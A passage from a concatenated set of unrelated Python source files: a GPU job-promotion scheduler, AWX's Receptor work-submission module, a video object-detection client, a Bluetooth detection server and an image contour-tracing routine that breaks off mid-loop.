################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
if len(promote_list) > 0:
promoted, demoted = max_param_promotion(K80_free, V100_free, V100_job, promote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
save_job(V100_node, job)
V100_job[gpu] = 'idle'
V100_used -= 1
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(V100_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
V100_job[gpu] = job_new
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_PJCT = np.average(list(PJCT.values()))
PJCT['average'] = average_PJCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
print('finished all runs')
JCT_name = testcase + '_JCT.json'
PJCT_name = testcase + '_PJCT.json'
PJCT_epoch_name = testcase + '_PJCT_epoch.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
param_name = 'param.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(PJCT_name, 'w') as fp2:
json.dump(PJCT, fp2, sort_keys=True, indent=4)
with open(PJCT_epoch_name, 'w') as fp2:
json.dump(PJCT_epoch, fp2, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(param_name, 'w') as fp1:
json.dump(param_dict, fp1, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
|
receptor.py
|
# Python
from base64 import b64encode
from collections import namedtuple
import concurrent.futures
from enum import Enum
import logging
import os
import shutil
import socket
import sys
import threading
import time
import yaml
# Django
from django.conf import settings
# Runner
import ansible_runner
# AWX
from awx.main.utils.execution_environments import get_default_pod_spec
from awx.main.exceptions import ReceptorNodeNotFound
from awx.main.utils.common import (
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
# Receptorctl
from receptorctl.socket_interface import ReceptorControl
logger = logging.getLogger('awx.main.tasks.receptor')
__RECEPTOR_CONF = '/etc/receptor/receptor.conf'
RECEPTOR_ACTIVE_STATES = ('Pending', 'Running')
class ReceptorConnectionType(Enum):
DATAGRAM = 0
STREAM = 1
STREAMTLS = 2
def get_receptor_sockfile():
with open(__RECEPTOR_CONF, 'r') as f:
data = yaml.safe_load(f)
for section in data:
for entry_name, entry_data in section.items():
if entry_name == 'control-service':
if 'filename' in entry_data:
return entry_data['filename']
else:
raise RuntimeError(f'Receptor conf {__RECEPTOR_CONF} control-service entry does not have a filename parameter')
else:
raise RuntimeError(f'Receptor conf {__RECEPTOR_CONF} does not have control-service entry needed to get sockfile')
def get_tls_client(use_stream_tls=None):
if not use_stream_tls:
return None
with open(__RECEPTOR_CONF, 'r') as f:
data = yaml.safe_load(f)
for section in data:
for entry_name, entry_data in section.items():
if entry_name == 'tls-client':
if 'name' in entry_data:
return entry_data['name']
return None
def get_receptor_ctl():
receptor_sockfile = get_receptor_sockfile()
try:
return ReceptorControl(receptor_sockfile, config=__RECEPTOR_CONF, tlsclient=get_tls_client(True))
except RuntimeError:
return ReceptorControl(receptor_sockfile)
def get_conn_type(node_name, receptor_ctl):
all_nodes = receptor_ctl.simple_command("status").get('Advertisements', None)
for node in all_nodes:
if node.get('NodeID') == node_name:
return ReceptorConnectionType(node.get('ConnType'))
raise ReceptorNodeNotFound(f'Instance {node_name} is not in the receptor mesh')
def administrative_workunit_reaper(work_list=None):
"""
This releases completed work units that were spawned by actions inside of this module
specifically, this should catch any completed work unit left by
- worker_info
- worker_cleanup
These should ordinarily be released when the method finishes, but this is a
cleanup of last-resort, in case something went awry
"""
receptor_ctl = get_receptor_ctl()
if work_list is None:
work_list = receptor_ctl.simple_command("work list")
for unit_id, work_data in work_list.items():
extra_data = work_data.get('ExtraData')
if (extra_data is None) or (extra_data.get('RemoteWorkType') != 'ansible-runner'):
continue # if this is not ansible-runner work, we do not want to touch it
params = extra_data.get('RemoteParams', {}).get('params')
if not params:
continue
if not (params == '--worker-info' or params.startswith('cleanup')):
continue # if this is not a cleanup or health check, we do not want to touch it
if work_data.get('StateName') in RECEPTOR_ACTIVE_STATES:
continue # do not want to touch active work units
logger.info(f'Reaping orphaned work unit {unit_id} with params {params}')
receptor_ctl.simple_command(f"work release {unit_id}")
class RemoteJobError(RuntimeError):
pass
def run_until_complete(node, timing_data=None, **kwargs):
"""
Runs an ansible-runner work_type on remote node, waits until it completes, then returns stdout.
"""
receptor_ctl = get_receptor_ctl()
use_stream_tls = getattr(get_conn_type(node, receptor_ctl), 'name', None) == "STREAMTLS"
kwargs.setdefault('tlsclient', get_tls_client(use_stream_tls))
kwargs.setdefault('ttl', '20s')
kwargs.setdefault('payload', '')
transmit_start = time.time()
sign_work = False if settings.IS_K8S else True
result = receptor_ctl.submit_work(worktype='ansible-runner', node=node, signwork=sign_work, **kwargs)
unit_id = result['unitid']
run_start = time.time()
if timing_data:
timing_data['transmit_timing'] = run_start - transmit_start
run_timing = 0.0
stdout = ''
try:
resultfile = receptor_ctl.get_work_results(unit_id)
while run_timing < 20.0:
status = receptor_ctl.simple_command(f'work status {unit_id}')
state_name = status.get('StateName')
if state_name not in RECEPTOR_ACTIVE_STATES:
break
run_timing = time.time() - run_start
time.sleep(0.5)
else:
raise RemoteJobError(f'Receptor job timeout on {node} after {run_timing} seconds, state remains in {state_name}')
if timing_data:
timing_data['run_timing'] = run_timing
stdout = resultfile.read()
stdout = str(stdout, encoding='utf-8')
finally:
if settings.RECEPTOR_RELEASE_WORK:
res = receptor_ctl.simple_command(f"work release {unit_id}")
if res != {'released': unit_id}:
logger.warn(f'Could not confirm release of receptor work unit id {unit_id} from {node}, data: {res}')
receptor_ctl.close()
if state_name.lower() == 'failed':
work_detail = status.get('Detail', '')
if work_detail:
raise RemoteJobError(f'Receptor error from {node}, detail:\n{work_detail}')
else:
raise RemoteJobError(f'Unknown ansible-runner error on node {node}, stdout:\n{stdout}')
return stdout
def worker_info(node_name, work_type='ansible-runner'):
error_list = []
data = {'errors': error_list, 'transmit_timing': 0.0}
try:
stdout = run_until_complete(node=node_name, timing_data=data, params={"params": "--worker-info"})
yaml_stdout = stdout.strip()
remote_data = {}
try:
remote_data = yaml.safe_load(yaml_stdout)
except Exception as json_e:
error_list.append(f'Failed to parse node {node_name} --worker-info output as YAML, error: {json_e}, data:\n{yaml_stdout}')
if not isinstance(remote_data, dict):
error_list.append(f'Remote node {node_name} --worker-info output is not a YAML dict, output:{stdout}')
else:
error_list.extend(remote_data.pop('errors', [])) # merge both error lists
data.update(remote_data)
except RemoteJobError as exc:
details = exc.args[0]
if 'unrecognized arguments: --worker-info' in details:
error_list.append(f'Old version (2.0.1 or earlier) of ansible-runner on node {node_name} without --worker-info')
else:
error_list.append(details)
except (ReceptorNodeNotFound, RuntimeError) as exc:
error_list.append(str(exc))
# If we have a connection error, missing keys would be trivial consequence of that
if not data['errors']:
# see tasks.py usage of keys
missing_keys = set(('runner_version', 'mem_in_bytes', 'cpu_count')) - set(data.keys())
if missing_keys:
data['errors'].append('Worker failed to return keys {}'.format(' '.join(missing_keys)))
return data
def _convert_args_to_cli(vargs):
"""
For the ansible-runner worker cleanup command
converts the dictionary (parsed argparse variables) used for python interface
into a string of CLI options, which has to be used on execution nodes.
"""
args = ['cleanup']
for option in ('exclude_strings', 'remove_images'):
if vargs.get(option):
args.append('--{}={}'.format(option.replace('_', '-'), ' '.join(vargs.get(option))))
for option in ('file_pattern', 'image_prune', 'process_isolation_executable', 'grace_period'):
if vargs.get(option) is True:
args.append('--{}'.format(option.replace('_', '-')))
elif vargs.get(option) not in (None, ''):
args.append('--{}={}'.format(option.replace('_', '-'), vargs.get(option)))
return args
def worker_cleanup(node_name, vargs, timeout=300.0):
args = _convert_args_to_cli(vargs)
remote_command = ' '.join(args)
logger.debug(f'Running command over receptor mesh on {node_name}: ansible-runner worker {remote_command}')
stdout = run_until_complete(node=node_name, params={"params": remote_command})
return stdout
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params.update(execution_environment_params)
if not settings.IS_K8S and self.work_type == 'local' and 'only_transmit_kwargs' not in self.runner_params:
self.runner_params['only_transmit_kwargs'] = True
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = get_receptor_ctl()
res = None
try:
res = self._run_internal(receptor_ctl)
return res
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
try:
receptor_ctl.simple_command(f"work release {self.unit_id}")
except Exception:
logger.exception(f"Error releasing work unit {self.unit_id}.")
@property
def sign_work(self):
return False if settings.IS_K8S else True
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
_kw = {}
if self.work_type == 'ansible-runner':
_kw['node'] = self.task.instance.execution_node
use_stream_tls = get_conn_type(_kw['node'], receptor_ctl).name == "STREAMTLS"
_kw['tlsclient'] = get_tls_client(use_stream_tls)
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params, signwork=self.sign_work, **_kw)
self.unit_id = result['unitid']
# Update the job with the work unit in-memory so that the log_lifecycle
# will print out the work unit that is to be associated with the job in the database
# via the update_model() call.
# We want to log the work_unit_id as early as possible. A failure can happen in between
# when we start the job in receptor and when we associate the job <-> work_unit_id.
# In that case, there will be work running in receptor and Controller will not know
# which Job it is associated with.
# We do not programatically handle this case. Ideally, we would handle this with a reaper case.
# The two distinct job lifecycle log events below allow for us to at least detect when this
# edge case occurs. If the lifecycle event work_unit_id_received occurs without the
# work_unit_id_assigned event then this case may have occured.
self.task.instance.work_unit_id = result['unitid'] # Set work_unit_id in-memory only
self.task.instance.log_lifecycle("work_unit_id_received")
self.task.update_model(self.task.instance.pk, work_unit_id=result['unitid'])
self.task.instance.log_lifecycle("work_unit_id_assigned")
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
# Artifacts are an output, but sometimes they are an input as well
# this is the case with fact cache, where clearing facts deletes a file, and this must be captured
artifact_dir = os.path.join(self.runner_params['private_data_dir'], 'artifacts')
if os.path.exists(artifact_dir):
shutil.rmtree(artifact_dir)
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
try:
unit_status = receptor_ctl.simple_command(f'work status {self.unit_id}')
detail = unit_status.get('Detail', None)
state_name = unit_status.get('StateName', None)
except Exception:
detail = ''
state_name = ''
logger.exception(f'An error was encountered while getting status for work unit {self.unit_id}')
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
if not self.task.instance.result_traceback:
try:
resultsock = receptor_ctl.get_work_results(self.unit_id, return_sockfile=True)
lines = resultsock.readlines()
receptor_output = b"".join(lines).decode()
if receptor_output:
self.task.instance.result_traceback = receptor_output
self.task.instance.save(update_fields=['result_traceback'])
elif detail:
self.task.instance.result_traceback = detail
self.task.instance.save(update_fields=['result_traceback'])
else:
logger.warn(f'No result details or output from {self.task.instance.log_format}, status:\n{state_name}')
except Exception:
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.runner_callback.event_handler,
finished_callback=self.task.runner_callback.finished_callback,
status_handler=self.task.runner_callback.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
if self.work_type == 'ansible-runner' and settings.AWX_CLEANUP_PATHS:
# on execution nodes, we rely on the private data dir being deleted
cli_params = f"--private-data-dir={private_data_dir} --delete"
else:
# on hybrid nodes, we rely on the private data dir NOT being deleted
cli_params = f"--private-data-dir={private_data_dir}"
receptor_params = {"params": cli_params}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
return 'kubernetes-runtime-auth'
return 'kubernetes-incluster-auth'
if self.task.instance.execution_node == settings.CLUSTER_HOST_ID or self.task.instance.execution_node == self.task.instance.controller_node:
return 'local'
return 'ansible-runner'
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.runner_callback.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
time.sleep(1)
@property
def pod_definition(self):
ee = self.task.instance.execution_environment
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
# According to the deepmerge docstring, the second dictionary will override when
# they share keys, which is the desired behavior.
# This allows user to only provide elements they want to override, and for us to still provide any
# defaults they don't want to change
pod_spec = deepmerge(default_pod_spec, pod_spec_override)
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
main.py
|
# encoding=utf-8
import detection_inference
import cv2
import numpy as np
import client
import threading
import ChannelManager
from presenter_types import *
import time
import os
import sys
import re
from graph import *
#判断输入是否正确(通过rtsp://和.MP4后缀判断)
lenofUrl = len(sys.argv)
if lenofUrl <= 1:
print("[ERROR] Please input mp4/Rtsp URL")
exit()
elif lenofUrl >= 3:
print("[ERROR] param input Error")
exit()
URL = sys.argv[1]
URL1 = re.match('rtsp://', URL)
URL2 = re.search('.mp4', URL)
if URL1 is None:
if URL2 is None:
print("[ERROR] should input correct URL")
exit()
else:
mp4_url = True
else:
mp4_url = False
detection_app = detection_inference.detectionInference()
detection_app.clientsocket = client.PresenterSocketClient((presenter_ip, presenter_port), 5, None)
thread_1 = threading.Thread(target=detection_app.clientsocket.start_connect)
thread_1.setDaemon(True)
thread_1.start()
time.sleep(0.1)
if detection_app.graph is None:
print('Create Graph Failed!')
exit()
channel_manager = ChannelManager.ChannelManager()
data = channel_manager.OpenChannel()
if detection_app.clientsocket is None:
print('detection_app.clientsocket is None')
exit()
detection_app.clientsocket.send_data(data)
cap = cv2.VideoCapture(URL)
ret, frame = cap.read()
if mp4_url:
try:
while ret:
detection_inference.dowork(frame,detection_app)
ret, frame = cap.read()
except Exception as e:
print("ERROR",e)
finally:
detection_app.dispose()
else:
rtsp_queue = client.Queue()
sub_thread = threading.Thread(target=detection_inference.sqEngine,args=(rtsp_queue,detection_app))
sub_thread.setDaemon(True)
sub_thread.start()
try:
while ret:
rtsp_queue.put(frame)
ret, frame = cap.read()
except Exception as e:
print("ERROR",e)
finally:
cv2.destroyAllWindows()
cap.release()
detection_app.dispose()
|
bt_server.py
|
import bluetooth, threading, time, cv2
from detection_utils import extract_box, nms, handle_prediction
from camera_parameters import *
import datetime
LBL_DATA_DELIMITER = '&&&'
DATA_START_SYMBOL = '###'
SIZE_START_SYMBOL = '$$$'
START_DET_COMMAND = 'START'
STOP_DET_COMMAND = 'STOP'
SEND_TEST_IMG_COMMAND = 'TEST CAMERA'
class BTServer:
'''
server is used to send data to user's phone and handles user's commands like stop/start detection
'''
def __init__(self):
self.accepting = False
self.test_required = False
self.sending = False
self.detecting = False
def startAdvertising(self):
t = threading.Thread(target=(self._advertise))
t.daemon = True
t.start()
return self
def startAccepting(self):
if not self.accepting:
t = threading.Thread(target=(self._accept))
t.daemon = True
t.start()
return self
def startSendingDetections(self, outputs, im):
self.outputs = outputs
self.im = im
t = threading.Thread(target=(self._sender))
t.daemon = True
t.start()
return self
def startReceiving(self):
t = threading.Thread(target=(self._receive))
t.daemon = True
t.start()
return self
def _receive(self):
while not self.test_required:
command = self.socket.recv(1024)
if command.decode('utf-8') == SEND_TEST_IMG_COMMAND:
print('required')
self.test_required = True
if command.decode('utf-8') == START_DET_COMMAND:
print('started detection')
self.detecting = True
if command.decode('utf-8') == STOP_DET_COMMAND:
print('paused detection')
self.detecting = False
def sendTestImage(self, im):
img_bytes = cv2.imencode('.jpg', im)[1].tostring()
data_size = len(img_bytes)
while self.sending:
time.sleep(0.5)
self.socket.send(SIZE_START_SYMBOL + str(data_size))
print('sent size')
self.socket.sendall(DATA_START_SYMBOL.encode() + img_bytes)
self.test_required = False
self.startReceiving()
def _accept(self):
self.accepting = True
self.socket, address = self.serverSocket.accept()
print('Got connection with', address)
self.accepting = False
self._receive()
def _advertise(self):
name = 'bt_server'
target_name = 'test'
uuid = '94f39d29-7d6d-437d-973b-fba39e49d4ee'
self.serverSocket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
port = bluetooth.PORT_ANY
self.serverSocket.bind(('', port))
print('Listening for connections on port: ', port)
self.serverSocket.listen(1)
port = self.serverSocket.getsockname()[1]
bluetooth.advertise_service((self.serverSocket),
'RoadeyeServer',
service_id=uuid,
service_classes=[
uuid, bluetooth.SERIAL_PORT_CLASS],
profiles=[
bluetooth.SERIAL_PORT_PROFILE])
self._accept()
def _sender(self):
tic = time.time()
detection_time = str(datetime.datetime.now().strftime('%c'))
boxes, classes, scores = handle_prediction(self.outputs)
boxes, classes, scores = nms(boxes, classes, scores, 0.5)
print('num of detections:', len(boxes))
while self.sending:
time.sleep(0.5)
try:
self.sending = True
for i, box in enumerate(boxes):
print(classes[i])
box_im = extract_box(box, self.im)
img_bytes = cv2.imencode('.jpg', box_im)[1].tostring()
label_and_img = (DATA_START_SYMBOL + classes[i] + LBL_DATA_DELIMITER).encode() + img_bytes
data_size = len(label_and_img) - len(DATA_START_SYMBOL)
print(data_size)
print(classes[i])
self.socket.send(SIZE_START_SYMBOL + str(data_size))
self.socket.sendall(label_and_img)
except:
pass
self.sending = False
|
image_process.py
|
from ..common.event import EventDispatcher
from ..common.events import *
from ..engine.vector import Vector
from ..input.image_input import ImageInput
from multiprocessing import Process, Pipe, Pool
import copy
import time
import operator
import numpy as np
import math
import time
def processYImage(img):
results = list()
img_height = img.shape[0]
img_width = img.shape[1]
img = img.reshape((img_width,img_height))
threshold = 150
min_length = 12
def isWithinBounds(position):
return position.x >= 0 and position.x < img_width and position.y >= 0 and position.y < img_height
def addPixel(pixel, size = Vector(1,1), direction = Key.DEBUG):
results.append(ImageInput(pixel, direction, size))
def clearArea(center, size):
img[center.y - size.y / 2: center.y + size.y / 2 + 1, center.x - size.x / 2:center.x + size.x / 2 + 1] = 0
def getValueFromArea(center, size):
return np.average(img[center.y - size.y / 2: center.y + size.y / 2 + 1, center.x - size.x / 2:center.x + size.x / 2 + 1])
def getValue(center):
if center.x < 0:
return 0
if center.x >= img_width:
return 0
if center.y < 0:
return 0
if center.y >= img_height:
return 0
return img[center.y][center.x]
def useWilburContour(start):
start_time = time.time()
cy = start.y
cx = start.x
min_x = 0
max_x = img_width - 1
min_y = cy
max_y = img_height - 1
# Find bottom right corner.
x = cx
for y in range(cy + 1, max_y + 1, +1):
if img[y][x] < threshold:
y -= 1
break
for x in range(x, max_x + 1, +1):
if img[y][x] < threshold:
if (x > min_x):
x -= 1
break
if (x > min_x):
x -= 1
for y in range(y, max_y + 1, +1):
if img[y][x] < threshold:
y -= 1
break
right = Vector(x - cx, y - cy)
# Find top left corner.
x = cx
for y in range(cy + 1, max_y + 1, +1):
if img[y][x] < threshold:
y -= 1
break
for x in range(x, min_x - 1, -1):
if img[y][x] < threshold:
if (x < max_x):
x += 1
break
if (x < max_x):
x += 1
for y in range(y, min_y - 1, -1):
if img[y][x] < threshold:
y += 1
break
left = Vector(x - cx, y - cy)
# Crudely calculate the length.
center = start + (left+right) / 2
length = math.sqrt(Vector.DistanceSqu(left, right) * 2.0)
if center.x - length / 2 < 0:
length = center.x * 2
if center.x + length / 2 > img_width - 1:
length = ((img_width - 1) - center.x) * 2
if center.y - length / 2 < 0:
length = center.y * 2
if center.y + length / 2 > img_height - 1:
length = ((img_height - 1) - center.y) * 2
length = int(length)
#print 'wilbur', time.time() - start_time
return (center, Vector(length, length))
def useSquareTracing(start):
up = 'up'
right = 'right'
down = 'down'
left = 'left'
delta = {
up : Vector(0, -1),
down : Vector(0, 1),
left : Vector(-1, 0),
right : Vector(1, 0)
}
turn_left = {
up : left,
down : right,
left : down,
right : up
}
turn_right = {
up : right,
down : left,
left : up,
right : down
}
def onUp(position):
position.y -= 1
def onDown(position):
position.y += 1
def onLeft(position):
position.x -= 1
def onRight(position):
position.x += 1
onMove = {
up : onUp,
down : onDown,
left : onLeft,
right : onRight
}
top_left = copy.copy(start)
bot_right = copy.copy(start)
start_time = time.time()
direction = right
start_direction = direction
position = start
while(getValue(position + delta[direction]) < threshold):
direction = turn_right[direction]
if direction == start_direction:
return (start, Vector(1,1))
position += delta[direction]
#onMove[direction](position)
while(not position == start):
if (time.time() - start_time) > 0.25:
break
if (getValue(position) >= threshold):
if (position.y > bot_right.y):
bot_right.y = position.y
if (position.x < top_left.x):
top_left.x = position.x
if (position.x > bot_right.x):
bot_right.x = position.x
direction = turn_left[direction]
else:
direction = turn_right[direction]
#position += delta[direction]
onMove[direction](position)
#print time.time() - start_time
return ((top_left + bot_right) / 2, bot_right - top_left + Vector(3,3))
def useMooreNeighborTracing(start):
start_time = time.time()
up = 'up'
right = 'right'
down = 'down'
left = 'left'
delta = {
up : Vector(0, -1),
down : Vector(0, 1),
left : Vector(-1, 0),
right : Vector(1, 0)
}
turn_left = {
up : left,
down : right,
left : down,
right : up
}
turn_right = {
up : right,
down : left,
left : up,
right : down
}
top_left = copy.copy(start)
bot_right = copy.copy(start)
start_time = time.time()
direction = right
position = start + delta[direction]
start_direction = copy.copy(direction)
while(getValue(position + delta[direction]) < threshold):
direction = turn_right[direction]
if direction == start_direction:
return (start, Vector(1,1))
while(not position == start):
if (time.time() - start_time) > 0.1:
break
if (getValue(position) >= threshold):
if (position.y > bot_right.y):
bot_right.y = position.y
if (position.x < top_left.x):
top_left.x = position.x
if (position.x > bot_right.x):
bot_right.x = position.x
direction = turn_left[direction]
start_position = position
position = start_position + delta[direction]
while(getValue(position) < threshold):
direction = turn_right[direction]
position = start_position + delta[direction]
return ((top_left + bot_right) / 2, bot_right - top_left + Vector(2,2))
start_time = time.time()
cycles = 0
while True:
if (time.time() - start_time) > 2.0:
break
cycles += 1
candidates = np.argwhere(img >= threshold)
if len(candidates) == 0:
break
candidate = candidates[0]
cy = candidate[0]
cx = candidate[1]
# Stop processing if the newest value is at the bottom.
if (cy > img_height - min_length):
break
#useMooreNeighborTracing(Vector(cx, cy))
(center, size) = useSquareTracing(Vector(cx, cy))
#(center, size) = useWilburContour(Vector(cx, cy))
y = center.y
x = center.x
if (size.x <= min_length or size.y <= min_length):
clearArea(center, size)
continue
step = 2
value = img[y][x]
value_threshold = threshold / 2
step_limit = min_length - step
if (y - step_limit < 0 or x - step_limit < 0 or x + step_limit >= img_width):
clearArea(center, size)
continue
for delta in range(0, step_limit):
if abs(value - int(img[y - delta][x])) > value_threshold:
y = y - delta
break
if abs(value - int(img[y][x - delta])) > value_threshold:
x = x - delta
break
if abs(value - int(img[y][x + delta])) > value_threshold:
x = x + delta
break
